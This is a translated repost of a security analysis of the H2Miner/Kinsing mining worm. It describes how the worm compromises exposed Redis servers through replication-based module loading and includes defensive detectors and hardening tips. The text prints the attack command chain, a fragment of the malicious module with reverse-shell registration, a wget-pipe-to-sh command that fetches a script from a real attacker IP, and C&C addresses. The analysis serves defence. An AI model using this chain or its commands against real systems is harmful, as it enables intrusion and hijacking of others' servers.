New outbreak of H2Miner worms discovered exploiting Redis RCE

The other day, one of my project's servers was attacked by a similar worm. While searching for an answer to the question "what is it?", I found a great article by the Alibaba Cloud Security team. Since I could not find this article on Habr, I decided to translate it especially for you <3

Introduction

Recently, Alibaba Cloud's security team discovered a sudden outbreak of H2Miner. This type of malicious worm uses missing authentication or weak passwords in Redis as a gateway into your systems, then synchronises its malicious module to the slave through master-slave synchronisation, and finally loads that malicious module on the attacked machine and executes malicious commands.

Previously, attacks on your systems were mostly carried out by writing scheduled tasks or SSH keys to your machine after the attacker had logged into Redis. Fortunately, this method often cannot be used because of permission-control problems or differences between system versions. However, this method of loading a malicious module can directly execute the attacker's commands or obtain shell access, which is dangerous for your system.

Because of the large number of Redis servers hosted on the Internet (almost one million), the Alibaba Cloud security team, as a friendly reminder, recommends that users do not expose Redis online, regularly check the strength of their passwords, and check whether they have been compromised, so that they can respond quickly.

H2Miner

H2Miner is a mining botnet for Linux-based systems that can penetrate your system in several ways, including missing authorization in Hadoop YARN, Docker, and the Redis remote command execution (RCE) vulnerability. The botnet works by downloading malicious scripts and malware for mining, expanding the attack laterally, and maintaining command-and-control (C&C) communication.

Redis RCE

Information about this issue was shared by Pavel Toporkov at ZeroNights 2018. Since version 4.0, Redis supports a plug-in loading feature that lets users load files compiled in C into Redis so that they execute specific Redis commands. This feature, although useful, has a vulnerability: in master-slave mode, files can be synchronised to the slave through the fullresync mode. An attacker can use this to transfer malicious so files. After the transfer is complete, attackers load the module on the attacked Redis instance and execute any command.

Malware Worm Analysis

Recently, the Alibaba Cloud security team noticed that the size of the H2Miner malicious mining group has increased sharply. According to the analysis, the general attack process is as follows:


H2Miner uses Redis RCE for the full attack. Attackers first attack unprotected Redis servers or servers with weak passwords.

They then use the command config set dbfilename red2.so to change the persistence file name. After that, the attackers execute the slaveof command to set the master-slave replication host address.

When the attacked Redis instance establishes a master-slave connection with the attacker's malicious Redis, the attacker sends the infected module using the fullresync command to synchronise the files. The red2.so file is thus transferred to the attacked machine. The attackers then use module load ./red2.so to load this so file. The module can execute commands from the attacker or initiate a reverse connection (backdoor) to gain access to the attacked machine.

    /* Fragment of the malicious module's initialisation: it registers two
       custom commands, system.exec and system.rev, through the Redis module API. */
    if (RedisModule_CreateCommand(ctx, "system.exec",
            DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx, "system.rev",
            RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

After executing a malicious command such as /bin/sh -c "wget -q -O- http://195.3.146.118/unk.sh | sh > /dev/null 2>&1", the attacker restores the persistence file name and unloads the system module to cover its tracks. However, the red2.so file remains on the attacked machine. Users are advised to check for the presence of this suspicious file in the directory of their Redis instance.
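The chain above leaves a distinctive trace in Redis command logging: the same client changes dbfilename to a shared object, issues slaveof, then loads a module. The following detector is an added example, not code from the original article or from Alibaba Cloud; it runs over a constructed sample of redis-cli MONITOR output (the client address 203.0.113.5 is a documentation address) and flags clients that performed all three stages in order.

```python
import re

# Constructed sample of `redis-cli MONITOR` output modelled on the attack chain
# described above (not real captured traffic; 203.0.113.5 is a documentation address).
SAMPLE_MONITOR = """\
1575000001.000001 [0 203.0.113.5:41230] "CONFIG" "SET" "dbfilename" "red2.so"
1575000001.100001 [0 203.0.113.5:41230] "SLAVEOF" "203.0.113.5" "6379"
1575000004.200001 [0 203.0.113.5:41230] "MODULE" "LOAD" "./red2.so"
1575000005.000001 [0 203.0.113.5:41230] "CONFIG" "SET" "dbfilename" "dump.rdb"
1575000010.000001 [0 10.0.0.7:51000] "GET" "session:42"
"""

LINE_RE = re.compile(r'^\d+\.\d+ \[\d+ (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"([^"]*)"')
STAGES = ("dbfilename_so", "slaveof", "module_load")  # order the worm uses


def classify(args):
    """Map one parsed command to a chain stage, or None for anything else."""
    cmd = args[0].upper()
    sub = args[1].upper() if len(args) > 1 else ""
    if cmd == "CONFIG" and sub == "SET" and len(args) == 4:
        if args[2].lower() == "dbfilename" and args[3].lower().endswith(".so"):
            return "dbfilename_so"
    elif cmd in ("SLAVEOF", "REPLICAOF") and sub != "NO":
        return "slaveof"
    elif cmd == "MODULE" and sub == "LOAD":
        return "module_load"
    return None


def stages_by_client(monitor_text):
    """Return {client: [stages seen, in order]} for clients that hit any stage."""
    seen = {}
    for line in monitor_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = ARG_RE.findall(m.group("args"))
        stage = classify(args) if args else None
        if stage:
            seen.setdefault(m.group("client"), []).append(stage)
    return seen


def full_chain_clients(monitor_text):
    """Clients that did all three stages in order: a strong signal of this worm."""
    hits = []
    for client, stages in stages_by_client(monitor_text).items():
        first = [stages.index(s) for s in STAGES if s in stages]
        if len(first) == len(STAGES) and first == sorted(first):
            hits.append(client)
    return hits
```

The restore of dbfilename to dump.rdb at the end of the sample is the cleanup step described above and is deliberately not flagged on its own.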

In addition to performing other malicious resource-hijacking actions, the attacker follows up the malicious script by downloading and executing malicious binary files from 142.44.191.122/kinsing. This means that a process name or directory name containing "kinsing" on the host may indicate that the machine has been infected by this malware.

Based on the reverse-engineering results, the malware mainly performs the following functions:

  • Installing files and executing them
  • Mining
  • Maintaining C&C communication and executing the attackers' commands


It uses masscan for external scanning to expand its reach. In addition, the C&C server IP address is hard-coded in the program, and the infected host communicates with the C&C server using HTTP requests, where the zombie (compromised server) information is placed in the HTTP headers.


GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
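The check-in above is easy to spot in proxy or sensor logs because the zombie's host profile travels in non-standard request headers and the browser-like User-Agent contradicts the Os header. The following is an added example, not code from the original article or from Alibaba Cloud; it parses raw HTTP/1.1 request text (the beacon reproduced from the page, plus a constructed ordinary browser request) and returns the reasons a request looks like this worm's C&C traffic.

```python
import re

# Constructed samples: the beacon shown above (headers as on the page) and an
# ordinary browser request, as raw HTTP/1.1 text the way a proxy or sensor logs it.
BEACON = (
    "GET /h HTTP/1.1\r\n"
    "Host: 91.215.169.111\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Arch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\n"
    "Osversion: 10.0\r\nRoot: false\r\nS: k\r\n"
    "Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\r\nVersion: 26\r\n"
    "Accept-Encoding: gzip\r\n\r\n"
)
NORMAL = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/70.0\r\n"
    "Accept: text/html\r\nAccept-Encoding: gzip\r\n\r\n"
)

# Non-standard headers the beacon uses to describe the zombie to the C&C server.
PROFILE_HEADERS = {"arch", "cores", "mem", "os", "osname", "osversion",
                   "root", "s", "uuid", "version"}


def parse_request(raw):
    """Split a raw HTTP request into (method, path, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path = request_line.split(" ")[:2]
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def beacon_indicators(raw, min_profile_headers=5):
    """Return the list of reasons this request looks like an H2Miner check-in."""
    method, path, h = parse_request(raw)
    reasons = []
    profile = PROFILE_HEADERS & set(h)
    if len(profile) >= min_profile_headers:
        reasons.append("host-profile headers present: " + ", ".join(sorted(profile)))
    if "windows" in h.get("user-agent", "").lower() and h.get("os", "").lower() == "linux":
        reasons.append("User-Agent claims Windows but Os header says linux")
    if method == "GET" and re.fullmatch(r"/[a-z]", path) and "uuid" in h:
        reasons.append("single-letter path with Uuid header")
    return reasons
```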

Other attack methods


Addresses and links used by the worm

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

C&C

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Tips

First, Redis should not be reachable from the Internet and should be protected by a strong password. It is also important that customers check that there is no red2.so file in the Redis directory and that no file or process name on the host contains "kinsing".

Source: www.habr.com
